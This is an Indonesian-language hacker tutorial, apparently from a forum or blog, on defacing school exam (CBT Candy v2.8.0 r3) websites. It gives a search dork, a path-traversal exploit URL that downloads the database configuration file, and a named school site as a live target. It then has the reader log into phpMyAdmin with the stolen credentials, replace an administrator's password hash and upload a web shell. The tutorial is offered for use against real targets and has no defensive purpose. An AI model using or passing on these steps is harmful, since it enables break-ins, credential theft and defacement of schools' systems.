assalamualaikum para heker
heyy balik lagi ama gw czxp:v
kali ini gw mau tutor Deface poc cbt new metode
+Live Target Dibawah
okelah langsung gas ke tutor aja okey
-Bahan Bahan
1. Hp / Pc
3.paket data/wifi
2. Sabar
-Dork
1. "CBT Candy v2.8.0 r3"
(kembangin)
-Exploit
/admin/backuprestore.php?nama_file=../config/config.database.php
TUTOR
Dorking Dorking Web Cari yg vuln:v
Nah masukin Exploit
contoh:
http://cbt.smpn2bara.sch.id/admin/backuprestore.php?nama_file=../config/config.database.php
Nah kalo udh masukin Exploit otomatis akan asa file ter download kalian buka file nya
contoh
nah sekarang kalian ke phpmyadmin
contoh:
http://cbt.smpn2bara.sch.id/phpmyadmin
Nah jika udh masuk ke phpmyadmin masukin username dan password config yg tadi kalian download
Nah setelah login masuk ke phpmyadmin
Di phpmyadmin klik aja tanda panah di paling pjok kiri atas
Nah terus klik databse nya klik bagian pengawas
Nah disini cari yang levelnya admin
trus klik edit password nya
password nya di encrypt ya
cara encrypt
Nah Roundsnya diubah dari 12 ke 10 trus masukin pass seterah kalian lalu hash
dan copy ada tombol hijau klik saja copy
Ke phpmyadmin lagi trus edit pass
Kalian tinggal login
Nah Dan boom berhasil tinggal upshell aja deh
Terima kasih udah mampir
Walaikumsalam